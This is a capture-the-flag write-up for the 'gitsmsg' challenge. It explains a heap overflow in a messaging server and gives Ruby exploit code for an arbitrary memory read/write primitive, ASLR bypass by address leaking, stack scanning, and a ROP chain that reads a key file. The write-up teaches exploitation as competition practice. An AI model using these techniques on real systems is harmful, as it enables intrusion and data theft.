Ghost in the Shellcode: gitsmsg (Pwnage 299)

“It’s Saturday night; I have no date, a 2L bottle of Shasta, and my all-rush mix tape. Let’s rock!”

…that’s what I said before I started gitsmsg. I then entered “Rush” into Pandora, and listened to a mix of Rush, Kansas, Queen, Billy Idol, and other 80’s rock for the entire level. True story.

Anyway, let’s get on with it! Not too long ago I posted my writeup for the 100-level “Pwnage” challenge from Ghost in the Shellcode. Now, it’s time to get a little more advanced and talk about the 299-level challenge: gitsmsg. Solved by only 11 teams, this was considerably more challenging.

As before, you can obtain the binary, my annotated IDA database, and exploit code on my Github page.


I’ll start right out by saying: gitsmsg was a huge timesink for me. It was a Linux-based 32-bit application, which was nice, but the codebase was biiiiig and scary; it took a long time to reverse, and possibly even longer to get the exploit working. I’ll explain the bumps I hit as I go through this.

The summary is, it’s a messaging server. You log in, queue/view/modify/delete messages for other users, send those messages, and read your own. The messages are stored in a heap-based linked list, and one type of message was vulnerable to a heap-based overflow. To make things difficult, the system implemented address-space layout randomization (ASLR) and data execution prevention (DEP), both of which had to be bypassed, and also had read-only relocations (RELRO) enabled, which marks its imports as read-only once they’ve been set up by the dynamic linker.

So, a heap overflow on a system with all modern protections. Sounds like a challenge!

This time, I’m not going to spend any time on the assembly or reversing portions; there’s just too much. I’ll describe the protocol, the vulnerability, and the exploit. My IDA file—available from the Github link above—is heavily annotated, so feel free to peruse it! And if you’re going to debug it, make sure you disable fork()/alarm() as I described in my last post!

The protocol

As I mentioned before, this is a messaging server. It supports seven different payload types, numbered 0x10 to 0x16, which can be used in nine different message types, numbered 0x01 to 0x09. Just for fun, here are my scratch notes I wrote while working on it.

Payload types

The following payloads are defined:

  • 0x10 :: a byte (uint8)
  • 0x11 :: an integer (uint32)
  • 0x12 :: a double (uint64)
  • 0x13 :: an array of bytes (uint8[])
  • 0x14 :: an array of integers (uint32[])
  • 0x15 :: an array of doubles (uint64[])
  • 0x16 :: a static null-terminated string (there are 4 or 5 possible choices, indexed with a byte value)

It’s possible that the types I called double might actually be intended as 64-bit integers, but ultimately it doesn’t matter.

No message can be longer than 0x400 bytes, total. Which means an array of doubles can’t be longer than 0x80 elements (0x80 elements * 8 bytes/element = 0x400 bytes).
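To make that size limit concrete, here's a quick Ruby sketch (the names are mine, not from the binary) of the maximum element counts implied by the 0x400-byte cap:

```ruby
MAX_MESSAGE_BYTES = 0x400

# Element sizes for the three array payload types
ELEMENT_SIZES = { byte_array: 1, int_array: 4, double_array: 8 }

# Maximum number of elements that fits under the message cap
def max_elements(type)
  MAX_MESSAGE_BYTES / ELEMENT_SIZES[type]
end
```

So a double array tops out at `max_elements(:double_array)` = 0x80 elements, matching the math above.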

Message types

These payload types can be used in any of the 9 message types:

  • 0x01 :: login :: must be sent initially, also retrieves your messages
  • 0x02 :: delete_queued_message :: unlinks a message from a linked list
  • 0x03 :: retrieve_my_messages :: retrieve a list of the queued messages I've sent
  • 0x04 :: store_message :: saves a message into a linked list of queued messages
  • 0x05 :: get_stored_message :: retrieves and displays a message from a linked list
  • 0x06 :: do_weird_math :: loops through the messages and does some kind of math that I didn't dig into
  • 0x07 :: send_queued_messages :: writes all your messages to the filesystem under the recipient's username; he'll get them when he logs in
  • 0x08 :: edit_queued_message :: edit a queued message
  • 0x09 :: quit

Message struct

The messages are all stored in a struct that looks like:

  • (uint32) unknown
  • (uint32) message_type
  • (uint32) message-specific payload (see below)
  • (uint32) message-specific payload (part 2)
  • (char[256]) from_username
  • (char[256]) to_username
  • (char[240]) filename
  • (char[272]) unknown/unused
  • (void*) next_message
Basically, a linked list. The most interesting field is "message-specific payload", which contains different data depending on the message_type (I'm guessing it's implemented as a union in the original program). For the simple datatypes (byte/int32/double), the message-specific payload is simply the 8-, 32-, or 64-bit value, stored across the pair of message-specific payload values. For the array types (byte array/int32 array/double array), the first message-specific payload value is a 32-bit pointer to some freshly allocated memory, and the second is the length of said memory (this pair will be very important later, when we read/write arbitrary memory!). Finally, for the static string type, it's a pointer to one of several static strings that are hardcoded into the binary (this value will be useful later when we want to bypass ASLR).

There's also the field I called 'unknown/unused'; I suspect that it's simply designed to make the struct bigger than a single message can possibly be—0x400 bytes—to prevent overwriting the 'next_message' pointer. But that's purely an unvalidated guess, especially since there are easier and better ways to get an arbitrary memory write (as I'll explain later).
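A quick Ruby sketch of the layout (field names are my own labels) shows why that padding guess is plausible—next_message sits past offset 0x400, out of reach of a maximum-length message:

```ruby
# Field name => size in bytes, in struct order
FIELDS = [
  [:unknown,       4],
  [:message_type,  4],
  [:payload_1,     4],   # pointer / low half of the value
  [:payload_2,     4],   # length  / high half of the value
  [:from_username, 256],
  [:to_username,   256],
  [:filename,      240],
  [:unused,        272], # the suspected padding
  [:next_message,  4],
]

# Compute each field's offset from the start of the struct
offset = 0
OFFSETS = {}
FIELDS.each do |name, size|
  OFFSETS[name] = offset
  offset += size
end
```

OFFSETS[:next_message] works out to 0x410 (1040), just past the 0x400-byte maximum message size.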

The vulnerability

I actually found this issue quite by accident. I was implementing the store/get protocol, and I kept getting mysterious SIGABRT signals. I plugged in a debugger and found that it was crashing in malloc(). Sweet! Sounds like a heap overflow! I narrowed it down by simply adding/removing messages of the different types, until I discovered that message type 0x15—DOUBLE_ARRAY—was the culprit. I took a look at the code that saves the double arrays to memory and immediately noticed this:
    .text:B7FFD897         mov     eax, dword ptr [esp+3Ch+local_length] ; jumptable 000017B1 case 5
    .text:B7FFD89B         lea     esi, [eax*8+0]  ; esi = local_length * 8
    .text:B7FFD8A2         cmp     esi, 3FFh
    .text:B7FFD8A8         mov     [ebp+message.length_for_certain_types], eax
    .text:B7FFD8AB         ja      return_send_1005
    .text:B7FFD8B1         mov     [esp+3Ch+out_arg_0], eax ; size
    .text:B7FFD8B4         call    _malloc         ; XXX - VULN! Allocate the wrong number of bytes - it's not multiplying by 8
    .text:B7FFD8B9         test    eax, eax
    .text:B7FFD8BB         jnz     short receive_esi_bytes_into_eax
    .text:B7FFD8BD         lea     esi, [esi+0]
    .text:B7FFD8C0         jmp     return_send_1005
It's multiplying the array size by 8 for the bounds check, but not for the malloc'd size! That means it'll always try to copy 8x too much data into the array! Now, what can we do with this?
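Here's a tiny Ruby model of that logic (my own reconstruction of the assembly above, not the server's code), showing how much extra data gets copied past the undersized buffer:

```ruby
# Mirrors the assembly: the bounds check uses num_elements * 8,
# but malloc() is passed the raw, un-multiplied num_elements.
def buggy_double_array_alloc(num_elements)
  bytes_to_copy = num_elements * 8
  return nil if bytes_to_copy > 0x3ff      # the 'cmp esi, 3FFh / ja' check
  bytes_allocated = num_elements           # the bug: should be bytes_to_copy
  { allocated: bytes_allocated, copied: bytes_to_copy,
    overflow: bytes_to_copy - bytes_allocated }
end
```

A 10-element array allocates 10 bytes but copies 80—an overflow of 70 bytes into whatever the heap hands out next.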

Reading and writing arbitrary memory

It's important to remember the structure of array-containing messages to understand how to read memory. In particular, this structure:

  • (uint32) unknown
  • (uint32) message_type
  • (uint32) message-specific payload (pointer)
  • (uint32) message-specific payload (length)
  • ...
Let's say we allocate an array of ten doubles using the following code (you can find these functions defined in my exploit code on Github):

    s = TCPSocket.new("", 8585)
    receive_code(s, 0x00001000, "init")
    login(s)
    store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
    result = get(s, 0)
    Hex.print(result)
Everything will be normal and it'll output:
    0000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0040  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
Great! Now let's allocate an int32 array, right after the double array:

    store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
    store(s, VARDATA_TYPE_INT_ARRAY, [0x42424242] * 2)
    Hex.print(get(s, 1))
    Hex.print(get(s, 0))
We get this output:

    0000  41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00   AAAAAAAAAAAA....
    0010  01 00 00 00 14 00 00 00 48 28 00 B8 02 00 00 00   ........H(......
    0020  41 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41   AAAAAAAAAA.AAAAA
    0030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0040  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    Length: 0x50 (80)
    0000  42 42 42 42 42 42 42 42                           BBBBBBBB
    Length: 0x8 (8)
Woah, what's going on here!? What we're actually seeing is the first 0x0c (12) bytes of the double array that we created, printing out as normal (a bunch of 'A's), followed by the heap header of the next message! The first array thinks it has 80 bytes to itself, and uses/displays all of them, when in reality it only actually has about 12 bytes (we only allocated 8 bytes, but rounding happens). The remaining 68 bytes are still in the heap's pool, and are completely fair game to be allocated. Then, when the second array is allocated, it takes up those bytes. In other words, we start with memory that looks like this:

    |                                 unallocated                                 |
    |  [empty memory]                                                             |

The first array is stored in allocated memory. First, the message metadata (the type, message-specific data, to, from, filename, next message) is allocated. We'll ignore that for now. More importantly, the data buffer is allocated, and it's allocated too short! The array requests 8 bytes to store all its data, and gets 12 bytes (because of rounding or whatever):

    |   array1   |                    unallocated                                  |
    |  [empty memory]                                                             |

The first array thinks it has 80 bytes, and fills it all up:

    |   array1   |                    unallocated                                  |
    |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|

Then along comes array2. Two chunks of memory are allocated for it, as well. The message metadata is allocated first, then a buffer for the message data is allocated. Because the metadata is allocated first, it ends up right after array1, and its heap header immediately lands inside array1's oversized view:

    |   array1   |                    array2 metadata                              |
    |AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|

Then message2 populates its various values, including the type (0x14 = INT_ARRAY), message-specific data (pointer to buffer = 0xb8002848, and length = 0x00000002), and from_username (which, kind of confusingly, I set to all 'A's). In the end, the entire rest of array1 is overwritten:

    |   array1   |                    array2 metadata                              |
    |AAAAAAAAAAAA[heap hdr][unknown][type=0x14][ptr=0xb8002848][len=2][from]...   |
Then, when we displayed it, we saw exactly that. The most interesting part of this is the message-specific data at bytes 0x18 - 0x20 of array2: 0xb8002848 and 0x00000002. They are part of the second array's metadata, and are located right smack in the middle of where the first array thinks its data is! And since the first array thinks the memory belongs to it, we can read/write it via the first array. To put it another way, when array1 thinks it's editing its own value, it's actually editing array2's metadata. What happens if I now edit the first array (the value here, 0xB7FFEC04, is a place where I happen to know I'll find a static string in memory)?
    edit(s, 1, 3, [0xB7FFEC04, 10].pack("II"))
Then read the second?

    Hex.print(get(s, 0))

It's going to dump out whatever happened to be in memory! It's truncated to the length I set (10 elements) multiplied by the element size (an INT_ARRAY has 4-byte elements) for a total length of 40 bytes:

    Length: 0x8 (8)
    0000  2F 68 6F 6D 65 2F 67 69 74 73 6D 73 67 2F 6D 73   /home/gitsmsg/ms
    0010  67 73 2F 25 73 2F 25 30 38 78 25 30 38 78 00 00   gs/%s/%08x%08x..
    0020  55 6E 62 72 65 61 6B 61                           Unbreaka
Going back to the memory layout we looked at before, we saw that the message-specific data (the pointer and the length) overwrote array1:

    |   array1   | ... [ptr = 0xb8002848][len = 0x00000002] ...                   |

But we modified array1 to change those values:

    |   array1   | ... [ptr = 0xB7FFEC04][len = 0x0000000a] ...                   |

And therefore, when array2 thought it was reading from its own buffer, it was actually reading from the wrong location—0xB7FFEC04. (If we use the edit() function on array2, we can write to that memory as well.)

The summary is, we can read and write arbitrary memory by allocating two arrays, using the first to modify the second's metadata, then reading or writing the second's data. Still with me? I hope so!
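The whole dance can be simulated in a few lines of plain Ruby (a toy model of the overlapping allocations, not the real protocol code):

```ruby
# A toy "heap": array1's 80-byte view starts at offset 0, but array2's
# metadata begins at offset 0x0c, which puts array2's buffer pointer and
# length at offsets 0x18..0x1f -- inside array1's claimed region.
heap = ("A" * 0x18) + [0xb8002848, 2].pack("VV") + ("A" * 0x30)

# Reading through array1's oversized view exposes array2's pointer/length:
ptr, len = heap[0x18, 8].unpack("VV")

# "Editing array1" at that offset rewrites array2's metadata, repointing
# its buffer at an address of our choosing (0xB7FFEC04, a static string):
heap[0x18, 8] = [0xB7FFEC04, 10].pack("VV")
new_ptr, new_len = heap[0x18, 8].unpack("VV")
```

After the edit, array2 will read (or write!) at 0xB7FFEC04 instead of its own buffer.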

Bypassing ASLR

For those of you who don't know what ASLR is, I recommend reading the Wikipedia page. The summary is, it means that modules and the stack don't load at the same address twice. So, even though I have an arbitrary read/write memory attack, I don't know where memory is, in theory. So how do we find it?

The first thing to realize is that the size of the binary in memory doesn't change, and the parts within the binary don't get re-arranged, so if we can determine where anything in the binary gets loaded, we can use clever math to figure out where everything gets loaded. We just have to leak a single address. How do we leak a single address? It turns out, with the read-memory attack we just saw, this is rather easy. We allocate a double array, as usual, which will get overwritten by the next allocation:

    store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
Then we allocate a static string, which will overwrite the latter part of the double array:

    store(s, VARDATA_TYPE_STRING, 0)

As I've mentioned before, the strings are indexes into a hardcoded list of strings. Therefore, the address of a static string in the binary will be saved in the message-specific data. Now, if we print out the double array:

    Hex.print(get(s, 1))

We get the address of the first such string:

    0000  41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00   AAAAAAAAAAAA....
    0010  01 00 00 00 16 00 00 00 B0 EB FF B7 00 00 00 00   ................
    ...
which is 0xb7ffebb0, in this case. I know—from the disassembled code—that this value is always 0x2bb0 bytes from the start of the binary, so I can calculate that the base address is 0xb7ffebb0 - 0x2bb0, or 0xb7ffc000 on this particular execution. From now on, I can base every address on that. And thus, ASLR has been bypassed for the binary. But not, sadly, for the stack. I couldn't find any way to leak a useful stack address.
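In Ruby, rebasing boils down to one subtraction (the 0x2bb0 offset comes from the disassembly; the helper names are mine):

```ruby
# Fixed offset of the first static string within the binary
STRING_OFFSET = 0x2bb0

# Given a leaked absolute address of that string, recover the load base
def base_address_from_leak(leaked_addr)
  leaked_addr - STRING_OFFSET
end

# Every other address of interest is then base + its fixed offset
def absolute(base, fixed_offset)
  base + fixed_offset
end
```

With the leak above, base_address_from_leak(0xb7ffebb0) gives 0xb7ffc000.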

Controlling EIP

Up till now, every writeup I've read has taken essentially the same steps, although they don't go through them in as much detail as I do (I love writing :) ). However, this is where paths diverge, and no two people have taken the same one.

The most obvious solution to controlling EIP is to overwrite the global offset table, which is the same as the solution to TI-1337. But, after a lot of mysterious crashing and debugging, I found out what RELRO means: the relocations are re-mapped as read-only after they are filled in. The .dtor section (destructors) is likewise mapped as read-only. Crap!

I spent a long, long time trying to figure out what to overwrite. Can I cause path traversal? Can anything in the .data section cause an overflow? Can I read a stack address from anywhere in known memory? Etc., etc., but no dice. Eventually, I realized that I could read large chunks of memory, so why not read the entire space where the stack might be? Experimentally, I determined that, at least on my system, the stack was always between 0xBF800000 and 0xBFFFFFFF. With that in mind, I wrote this beast:
    # This function is kind of an ugly hack, but it works reliably so I can't really
    # complain.
    #
    # It basically searches a large chunk of memory for a specific return address.
    # When it finds that address, it returns where it found it.
    def find_return_address(s, base_addr)
      address_to_find = [base_addr + MAIN_RETURN_ADDRESS].pack("I")

      # Store an array of doubles. This will overlap the next allocation
      store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x5e5e5e5e5e5e5e5e] * 4)

      # Store an array of bytes. We'll be able to change the length and location
      # of this buffer in order to read arbitrary memory
      store(s, VARDATA_TYPE_BYTE_ARRAY, [0x41])

      # Overwrite the location and size of the byte array. The location will be
      # set to STACK_MIN, and the size will be set to STACK_MAX - STACK_MIN
      edit(s, 1, 3, [STACK_MIN, (STACK_MAX - STACK_MIN)].pack("II"))
      puts("Reading the stack (0x%08x - 0x%08x)..." % [STACK_MIN, STACK_MAX])

      # We have to re-implement "get" here, so we can handle a large buffer and
      # so we can quit when we find what we need
      out = [MESSAGE_GET, 0].pack("II")
      s.write(out)
      get_int(s) # type (don't care)
      len = get_int(s)
      result = ""

      # Loop and read till we either reach the end, or we find the value we need
      while(result.length < len)
        result = result + s.recv(STACK_MAX - STACK_MIN + 1)

        # As soon as we find the location, end
        if(loc = result.index(address_to_find))
          return STACK_MIN + loc
        end
      end

      # D'awww :(
      puts("Couldn't find the return address :(")
      exit
    end
It uses the exact same technique we initially used to read that static string from memory, except instead of reading 20 or 30 bytes, it reads 0x7fffff—about 8 megabytes. Somewhere in that chunk of memory will be the actual stack. And somewhere on the stack will be the return address of the main looping function. And, fortunately, because I can capture the base address of the binary (outlined in the last section), I know exactly what that address will be!

To put it another way: I know that the main loop returns to a fixed address when it's done. I can calculate that address, and therefore I know the absolute return address of the main loop. If I know it, I can find it on the stack. And if I can find it on the stack, I can change it. Here's some code that finds the address and changes it:
    # Set up the connection
    s = TCPSocket.new("", 8585)
    receive_code(s, 0x00001000, "init")
    login(s)

    # Get the base address
    base_addr = get_base_address(s)

    # Get the return address
    return_address = find_return_address(s, base_addr)

    # Do a typical overwrite - overwrite the main loop's return address
    # with 0x43434343
    store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x4141414141414141] * 10)
    store(s, VARDATA_TYPE_INT_ARRAY, [0x42424242])
    edit(s, 1, 3, [return_address, 1].pack("II"))
    edit(s, 0, 0, [0x43434343].pack("I"))

    # Cause the main loop to return
    quit(s)
Can you guess what happens to the server?
    Program received signal SIGSEGV, Segmentation fault.
    0x43434343 in ?? ()
Yup, EIP control. To summarize: reading the entire stack is hacky, and I doubt it would work on a 64-bit system, but it worked great in this case!
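The core of the search is just a substring match over the dump; here's the address arithmetic in isolation (a simplified, offline version of find_return_address above):

```ruby
STACK_MIN = 0xBF800000

# Given the raw bytes read starting at STACK_MIN, and the known absolute
# return address, compute the stack address that holds that return address.
def locate_return_address(dump, return_address)
  needle = [return_address].pack("V")   # 32-bit little-endian
  index = dump.index(needle)
  index && STACK_MIN + index            # nil if it isn't in the dump
end
```

Once you have that stack address, the edit()-based arbitrary write can overwrite the saved return address in place.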

Aside: Stashing data

It's really easy to stash data and get its address back. I'm going to want to open and read a file later, so I need a way to stash the filename and reference it later. This documented code should explain everything:
    # Store a series of bytes in memory, and return the absolute address
    # of where in memory those bytes are stored
    def stash_data(s, data)
      # Store an array of doubles - this will allocate 4 bytes and overwrite 32
      store(s, VARDATA_TYPE_DOUBLE_ARRAY, [0x5e5e5e5e5e5e5e5e] * 4)

      # Store an array of bytes, which are the data. It will allocate a buffer
      # in which to store these bytes, a pointer to which is written over the
      # previous entry
      store(s, VARDATA_TYPE_BYTE_ARRAY, data.bytes.to_a)

      # Get bytes 24 - 27 of the double array, which is where a pointer to the
      # allocated buffer (containing 'data') will be stored
      result = get(s, 1)[24..27].unpack("I").pop

      puts("'%s' stored at 0x%08x" % [data, result])
      return result
    end

Getting execution

So, I got this all working, and immediately stashed some simple shellcode and jumped to it. And it crashed. That means that data execution prevention—DEP—is enabled, so I can only execute code from executable (+x) sections of memory. I know how to bypass that fairly easily with return-oriented programming, but it was a kick in the face after all that work. Just make this easy on me, guys! :) This isn't going to teach you how to write a ROP payload (one of my past CTF blogs will teach you in great detail!), but let me tell you: once you do this a couple times, it actually gets really easy!
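As a refresher, each "call" in a classic 32-bit ROP chain is the function's address, a pop/pop/(pop/)ret gadget to clean the arguments off the stack, and then the arguments themselves. A minimal sketch (the helper names and placeholder addresses are mine):

```ruby
# Build one ROP "frame": func_addr is returned into, then the cleanup
# gadget pops the arguments and returns into the next frame.
def rop_frame(func_addr, cleanup_gadget, *args)
  [func_addr, cleanup_gadget, *args]
end

# Chain frames and pack them into the little-endian dwords that will
# sit on the stack in place of the saved return address.
def pack_chain(*frames)
  frames.flatten.pack("V*")
end
```

A two-argument call like open(path, 0) becomes rop_frame(OPEN, PPR, path, 0)—four dwords, 16 bytes on the stack.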

Another aside: helpful hint on testing your exploit

Super helpful hint: the first thing I did after realizing that DEP was enabled was jump to base_addr+0x2350, which looks like this:
    .text:B7FFE350 handle_packet_00000009_quit:            ; CODE XREF: do_client_stuff+71j
    .text:B7FFE350                                         ; DATA XREF: do_client_stuff:off_B7FFE324o
    .text:B7FFE350                 mov     [esp+2Ch+out_arg_0], 1003h ; packet 9 returns the integer 0x00001003 then exits
    .text:B7FFE357                 call    send_int
    .text:B7FFE35C loc_B7FFE35C:                           ; CODE XREF: do_client_stuff+5Bj
    .text:B7FFE35C                 add     esp, 20h
    .text:B7FFE35F                 xor     eax, eax
    .text:B7FFE361                 pop     ebx
    .text:B7FFE362                 pop     esi
    .text:B7FFE363                 pop     edi
    .text:B7FFE364                 retn
It sends out the integer 0x1003, then attempts to return (and probably crashes). But getting that 0x1003 back from the socket after writing this was exactly the push I needed to keep going: I knew my EIP control was working. Besides returning into known-good code like that, the shellcode eb fe (jmp -2) and cd 03 (debug breakpoint) are fantastic ways to debug exploits. The former never returns, and the latter crashes immediately (and gives you debugger control if it's local). It's the perfect way to test whether your code is actually being run!
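In Ruby, those two test payloads are just two bytes each (a sketch; where you point EIP is up to your exploit):

```ruby
# x86: eb fe => jmp -2. A tight infinite loop: the process hangs instead
# of crashing, which proves your bytes actually executed.
INFINITE_LOOP = "\xeb\xfe".b

# x86: cd 03 => int 3. An immediate breakpoint: crashes at once, or traps
# into your debugger if you're attached locally.
BREAKPOINT = "\xcd\x03".b
```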

Back to our originally scheduled program...

All right, let's look at our ROP chain!

    # This generates the ROP stack. It's a simple open + read + write. The
    # only thing I'm not proud of here is that I make an assumption about what
    # the file handle will be after the open() call - but it seems to reliably
    # be '0' in my testing
    def get_rop(file_path, base_addr, fd)
      stack = [
        # open(filename, 0)
        base_addr + OPEN,  # open()
        base_addr + PPR,   # pop/pop/ret
        file_path,         # filename = value we created
        0,                 # flags

        # read(fd, filename, 100) # We're re-using the filename as a buffer
        base_addr + READ,  # read()
        base_addr + PPPR,  # pop/pop/pop/ret
        0,                 # fd - because all descriptors are closed, the first available descriptor is '0'
        file_path,         # buf
        100,               # count

        # write(fd, filename, 100)
        base_addr + WRITE, # write()
        base_addr + PPPR,  # pop/pop/pop/ret
        fd,                # fd
        file_path,         # buf
        100,               # count

        # This was simply for testing, it sends 4 bytes then exits
        #base_addr + 0x2350
      ]

      return stack
    end
Once again, this is fairly simple! We open a file. The file_path is something we stashed earlier, and is "/home/gitsmsg/key". We return to a pop/pop/ret to clean the two arguments off the stack. We read up to 100 bytes from the file into the place where we stashed the filename (since it's handy and writeable). We use the file handle 0, because that's the handle that's always used (all the handles are closed in the child process, and the syscall promises to use the lowest unused handle). Hardcoding the file handle was ugly, but way easier than actually figuring it out. Finally, we write up to 100 bytes from that buffer back to the main file descriptor of the connection—that is, back to the socket that I'm communicating through. This descriptor was obtained by reading the right place in memory.

It's simple, but it works! And if all goes according to plan, here's the exploit running:
    $ ruby sploit.rb
    ** Initializing
    ** Logging in
    ** Stashing a path to the file on the heap
    '/home/gitsmsg/key' stored at 0xb8c2f848
    ** Using a memory leak to get the base address [ASLR Bypass]
    ... found it @ 0xb77dd000!
    ** Reading the file descriptor from memory
    ... it's 4!
    ** Searching stack memory for the return address [Another ASLR Bypass]
    Reading the stack (0xbf800000 - 0xbfffffff)...
    ... found it @ 0xbfd0546c
    ** Generating the ROP chain [DEP Bypass]
    ** Writing the ROP chain to the stack
    ** Sending a 'quit' message, to trigger the payload
    ** Crossing our fingers and waiting for the password
    The key is: lol, tagged unions for the WIN!
w00t! Full exploit is here.


For those of you who are counting, this is a heap overflow on a system with ASLR, DEP, stack cookies, RELRO, and safe heap unlinking. We bypass some of those, and simply ignore others that don't apply, to run arbitrary code 100% reliably. I'm proud to say, it's the most difficult exploit I've ever written, and I'm thrilled I could share it with everybody!

